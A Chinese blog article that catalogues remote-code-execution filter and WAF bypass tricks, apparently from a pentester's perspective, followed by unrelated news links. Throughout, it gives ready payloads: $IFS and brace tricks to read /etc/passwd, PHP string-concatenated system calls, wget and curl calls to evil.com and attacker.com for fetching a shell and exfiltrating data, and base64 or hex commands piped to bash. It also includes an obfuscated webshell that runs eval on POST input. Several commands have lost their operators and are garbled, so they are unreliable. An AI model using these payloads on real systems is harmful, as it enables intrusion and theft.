盘点RCE(远程代码执行)那些意想不到的绕过奇技
1. 空格过滤的N种花式绕过当Web应用对空格进行过滤时攻击者往往会陷入困境。但实战中我发现Linux系统提供了至少8种等效空格的替代方案。最经典的是使用$IFS环境变量这个存储着默认分隔符的变量在bash中默认就是空格。比如执行cat$IFS/etc/passwd就能完美绕过基础过滤。更隐蔽的招数是用${IFS}的变体形式比如$IFS$9。这里的$9指向第9个命令行参数通常为空字符串组合起来就成了隐形空格。我曾在一个CTF比赛中用{cat,/etc/passwd}这种花括号语法成功绕过WAF原理是花括号内的逗号会被解析为参数分隔符。对于Web环境还可以用URL编码套路%20是标准空格编码%09是水平制表符%0a换行符在某些场景也能用有个特别骚的操作是用重定向符号伪装cat/etc/passwd。这个符号在Linux中会被解析为输入重定向但看起来完全不像空格。类似的还有组合我在测试某电商系统时就用这招突破了过滤。2. 命令执行函数的七十二变很多WAF会重点监控system()、exec()这类高危函数但PHP实际有十几种执行命令的途径。有次渗透测试遇到过滤system的情况我改用反引号ls直接执行成功——这种语法本质调用的是shell_exec()。更隐蔽的姿势是利用popen()和proc_open()这类流式处理函数。比如$handle popen(whoami, r); echo fread($handle, 1024); pclose($handle);这种写法既执行了命令又规避了直接的关键词匹配。PHP的动态函数调用特性更是个宝藏$func sy.stem; $func(ls);通过字符串拼接就能轻松绕过静态检测。我还见过用call_user_func_array()调用命令的案例这种冷门函数很少被加入黑名单。3. 连接符的魔法组合命令连接符就像SQL注入中的and/or不同组合会产生奇妙效果。Windows和Linux都支持的符号最实用ping 127.0.0.1 whoami这个会让前后命令都执行常用于盲注场景。在Linux中分号;是万能连接器cd /tmp; wget http://evil.com/shell但更狡猾的是||组合只有前命令失败才执行后者。有次遇到严格过滤的登录接口我构造false || curl -X POST https://attacker.com成功触发了数据外泄。最危险的是连接它要求前命令必须成功[ -f /etc/passwd ] cat /etc/passwd这种写法在防御方看来就像普通条件判断极具迷惑性。4. 编码的艺术从Base64到十六进制当直接输入命令被拦截时编码转换就是绝佳跳板。Base64是最常用的echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash这个payload先解码成cat /etc/passwd再执行。我在某次红队行动中用这种三层嵌套绕过EDR检测echo d2hvYW1p | base64 -d | bash十六进制更隐蔽echo 636174202F6574632F706173737764 | xxd -r -p | bash甚至可以用八进制ASCII码$(printf \154\163) # 等价于ls最绝的是Unicode编码绕过像这样\u{63}\u{61}\u{74} /etc/passwd这种写法在PHP环境下尤其有效很多WAF根本不会解码检测。5. 通配符的奇幻漂流Linux的通配符简直是绕过利器。当/被过滤时可以这样玩cat /etc???pass*问号匹配单个字符星号匹配任意长度。有次遇到严格过滤的场景我用cat /e??/p??s??成功读取了密码文件。更高级的玩法是用字符类cat /[e]tc/[p]asswd方括号表示匹配其中任意字符虽然这里只有一个字符显得多此一举但能有效干扰正则检测。花括号扩展也很有用{cat,/etc/passwd}这种语法会被解析为两个参数完全避开了空格检测。我在某个云服务商的沙箱逃逸漏洞中就用这个技巧突破了命令限制。6. 变量拼接的魔术戏法PHP的变量特性让安全过滤变得困难。看这个例子$asys;$btem;$a.$b(whoami);通过字符串拼接动态生成system函数名。更隐蔽的版本$_[];$_$_;$_$_[!];$__$_;$__;$__;$__;$___$__;$__;$__;$____$__;$__;$__;$_____$__;$______$____$___$__$_____;$______($_[_]);这段天书般的代码最终执行的是eval($_POST[_])原理是利用数组转换和字符自增。环境变量也能玩出花${PATH:0:1} # 提取PATH变量的第一个字符(/) ${PATH:5:1}${PATH:2:1} # 组合成ls这种写法完全不出现任何命令关键词靠变量截取拼出完整指令。7. 注释的障眼法PHP注释不仅能干扰代码审计还能帮助绕过WAF。例如system/*这是注释*/(whoami);注释完美拆分了函数名和参数。更复杂的变种(sy./*xyz*/.stem)/**/(wh./*123*/.oami);这种写法对基于正则的防护简直是降维打击。我在测试某防火墙时用这种技巧成功执行了system(whoami)。HTML实体编码也值得一试system(#x77;#x68;#x6f;#x61;#x6d;#x69;);服务端会自动解码为正常命令但WAF可能只检查原始输入。8. 冷门字符的奇袭有些特殊字符在命令解析中有妙用。比如$*和$在没有参数时都为空who$ami whoa$*mi实际执行的都是whoami。反斜杠转义也能制造混乱c\a\t /etc/passwd未初始化变量是另一个突破口cat$u /etc/passwd这里的$u未定义会被替换为空字符串。我还见过用${undefined}绕过的案例原理相同但更隐蔽。反引号嵌套堪称终极杀招666whoami666虽然会报错666root666: command not found但命令已经执行且输出结果显示在错误信息中。这种技巧在盲注场景特别有用。

相关新闻

从理论到代码:GTSAM中IMU预积分因子构建与优化实战解析

从理论到代码:GTSAM中IMU预积分因子构建与优化实战解析

1. IMU预积分:从理论到代码的桥梁 IMU预积分是SLAM领域的一个关键技术突破,它解决了传统IMU积分在优化框架中的两大痛点:累积误差和重复计算。想象一下你正在用IMU数据追踪无人机的位置——如果每次优化后都要从头开始重新积分,计…

2026/6/29 7:18:07阅读更多 →
LLCOM串口调试工具技术深度解析:Lua自动化与多协议融合的创新应用指南

LLCOM串口调试工具技术深度解析:Lua自动化与多协议融合的创新应用指南

LLCOM串口调试工具技术深度解析:Lua自动化与多协议融合的创新应用指南 【免费下载链接】llcom 🛠功能强大的串口工具。支持Lua自动化处理、串口调试、WinUSB、串口曲线、TCP测试、MQTT测试、编码转换、乱码恢复等功能 项目地址: https://gitcode.com/g…

2026/6/29 7:13:06阅读更多 →
SEBD框架:量子动力学模拟中的纠缠熵控制新方法

SEBD框架:量子动力学模拟中的纠缠熵控制新方法

1. SEBD框架概述:量子动力学模拟的新范式 在量子多体系统的经典模拟中,纠缠熵的增长一直是制约计算可扩展性的核心瓶颈。传统张量网络方法如TEBD(时间演化块解耦)虽然能有效描述一维系统的量子态,但随着模拟时间的延长…

2026/6/29 7:13:06阅读更多 →
XRAY爬虫模式实战:构建企业内网Web资产自动化漏洞巡检流水线

XRAY爬虫模式实战:构建企业内网Web资产自动化漏洞巡检流水线

1. 项目概述:从单点扫描到自动化资产巡检的转变在安全测试的日常工作中,我们常常面临一个矛盾:手头有像XRAY这样强大的被动扫描工具,但它默认的工作模式是代理模式,需要手动配置浏览器代理,然后一个个页面去…

2026/6/29 8:33:14阅读更多 →
炉石传说HsMod插件终极指南:60+功能一键解锁游戏新境界

炉石传说HsMod插件终极指南:60+功能一键解锁游戏新境界

炉石传说HsMod插件终极指南:60功能一键解锁游戏新境界 【免费下载链接】HsMod Hearthstone Modification Based on BepInEx 项目地址: https://gitcode.com/GitHub_Trending/hs/HsMod 想要彻底改变你的炉石传说游戏体验吗?HsMod插件正是你寻找的终…

2026/6/29 8:33:14阅读更多 →
PE-bear:Windows逆向分析中的PE文件结构解析与实战工具

PE-bear:Windows逆向分析中的PE文件结构解析与实战工具

1. 项目概述:为什么PE-bear是逆向工程师的“瑞士军刀” 如果你在Windows平台上做过逆向分析,尤其是恶意软件分析或者软件漏洞研究,那你一定绕不开PE文件。PE(Portable Executable)是Windows操作系统上可执行文件、动态…

2026/6/29 8:33:14阅读更多 →
3分钟学会DLSS版本管理:用DLSS Swapper轻松提升游戏画质和帧率

3分钟学会DLSS版本管理:用DLSS Swapper轻松提升游戏画质和帧率

3分钟学会DLSS版本管理:用DLSS Swapper轻松提升游戏画质和帧率 【免费下载链接】dlss-swapper 项目地址: https://gitcode.com/GitHub_Trending/dl/dlss-swapper 还在为游戏画面模糊、帧率不稳而烦恼吗?DLSS版本管理可能是你一直在寻找的解决方案…

2026/6/29 8:33:14阅读更多 →
使用JMeter对RabbitMQ进行压力测试实战指南

使用JMeter对RabbitMQ进行压力测试实战指南

1. 项目概述:为什么需要压测RabbitMQ?在分布式系统里,消息队列(Message Queue)就像是交通枢纽,负责在不同服务间调度和解耦流量。RabbitMQ作为这个领域的“老牌劲旅”,以其稳定性和丰富的特性被…

2026/6/29 8:33:14阅读更多 →
从零到一:轮趣N100九轴IMU在ROS中的驱动配置与数据可视化实战

从零到一:轮趣N100九轴IMU在ROS中的驱动配置与数据可视化实战

1. 硬件准备与环境搭建 第一次拿到轮趣N100九轴IMU时,我注意到这个火柴盒大小的设备竟然集成了三轴加速度计、三轴陀螺仪和三轴磁力计。这种九轴传感器在机器人定位和导航中特别有用,但要让它在ROS系统中跑起来,得先过硬件连接这一关。 我建…

2026/6/29 8:28:14阅读更多 →
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…

2026/6/29 3:27:55阅读更多 →
审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

引言:审计结束三个月了,审计员的权限还没关某城商行每年按照监管要求开展至少一次数据安全审计。审计期间,内审部门需要抽样检查各类业务数据——交易流水、客户信息、员工操作日志、权限配置记录。这些数据分布在不同系统中,审计…

2026/6/29 2:19:08阅读更多 →
如何在3秒内从普通图片生成专业级法线贴图:DeepBump的终极指南

如何在3秒内从普通图片生成专业级法线贴图:DeepBump的终极指南

如何在3秒内从普通图片生成专业级法线贴图:DeepBump的终极指南 【免费下载链接】DeepBump Normal & height maps generation from single pictures 项目地址: https://gitcode.com/gh_mirrors/de/DeepBump 还在为3D建模中的纹理制作而烦恼吗?…

2026/6/29 0:01:47阅读更多 →
OCAuxiliaryTools:终极OpenCore配置工具,让黑苹果安装从未如此简单!

OCAuxiliaryTools:终极OpenCore配置工具,让黑苹果安装从未如此简单!

OCAuxiliaryTools:终极OpenCore配置工具,让黑苹果安装从未如此简单! 【免费下载链接】OCAuxiliaryTools Cross-platform GUI management tools for OpenCore(OCAT) 项目地址: https://gitcode.com/gh_mirrors/oc/OCA…

2026/6/29 0:01:47阅读更多 →
终极Windows 11精简指南:使用tiny11builder快速创建纯净系统镜像

终极Windows 11精简指南:使用tiny11builder快速创建纯净系统镜像

终极Windows 11精简指南:使用tiny11builder快速创建纯净系统镜像 【免费下载链接】tiny11builder Scripts to build a trimmed-down Windows 11 image. 项目地址: https://gitcode.com/GitHub_Trending/ti/tiny11builder 你是否厌倦了Windows 11系统自带的20…

2026/6/29 0:01:47阅读更多 →